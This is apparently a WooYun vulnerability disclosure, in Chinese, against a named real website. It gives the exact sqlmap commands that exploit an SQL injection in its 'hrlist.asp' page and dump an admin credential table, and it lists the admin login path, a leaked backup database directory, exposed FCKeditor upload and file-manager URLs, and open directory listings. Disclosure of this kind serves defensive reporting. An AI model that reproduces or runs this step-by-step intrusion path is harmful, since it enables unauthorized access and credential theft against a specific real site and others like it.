WooYun.org

这是一次奇妙的旅程，首先是一个sql注入
【注入点】：
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274"
手工判断确认是注入了，但是sqlmap却无法判断注入点的数据库类型，也就是无法深入了

看到一堆not很郁闷，根据经验判断网站架构 和 sqlmap在判断Access的时候多进行了一步这两点
猜测数据库时Access
【更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access
【sqlmap表示也认同】

所以，don't give up
然后，没有后台，再次郁闷，可是：
【找后台】
通过目录遍历，http://www.gerunzs.com/products/
找到后台：http://www.gerunzs.com/gerun_admin/admin_index.asp
然后，没有管理员账号密码，又一次郁闷，可是：
【找管理员账号密码】
通过备份数据库泄露：
http://www.gerunzs.com/database/

下载后查看：
管理信息泄露

可是， 账号密码不对，还是进不去
但是，通过查看数据库，猜测数据库结构没有变，数据库的管理信息存放在ImgAdmin,尝试一下
【再次更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access -T "ImgAdmin" --columns
终于可以获得账号密码了，额，点到为止

【其他漏洞】
【1】FCK对外
http://www.gerunzs.com/fckeditor/
http://www.gerunzs.com/fckeditor/editor/
http://www.gerunzs.com/fckeditor/editor/filemanager/connectors/asp/
http://www.gerunzs.com/fckeditor/editor/dialog/
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/browser.html
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/frmupload.html
editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
【2】目录遍历
http://www.gerunzs.com/test/
http://www.gerunzs.com/products/
http://www.gerunzs.com/images/